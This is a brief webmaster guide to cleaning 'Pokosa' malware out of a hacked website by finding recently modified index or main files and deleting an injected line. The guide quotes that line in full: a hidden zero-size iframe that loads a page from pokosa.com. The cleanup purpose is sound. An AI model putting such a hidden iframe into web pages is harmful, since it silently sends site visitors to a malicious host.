Removing Pokosa Malware
- First, login in to your control panel manager or ftp account.
- Locate files that was recently modified. You can sort it by date modified from latest to oldest. You will notice that the latest file would be either be index.html/php or main.html/php.
- Edit and Find this line in your php file.<iframe src=”http://pokosa.com/tds/go.php?sid=1″ frameborder=”0″ width=”0″ height=”0″></iframe>
This line is usually located at the bottom of your index.html, index.php, main.html or main.php - Delete it and Save your file.
If your website contains a lot of index or main file, it is highly possible that not only one file got infected by Pokosa malware. You can edit them manually one by one or alternatively use a batch mass edit and replace command or application like Batch Replacer.
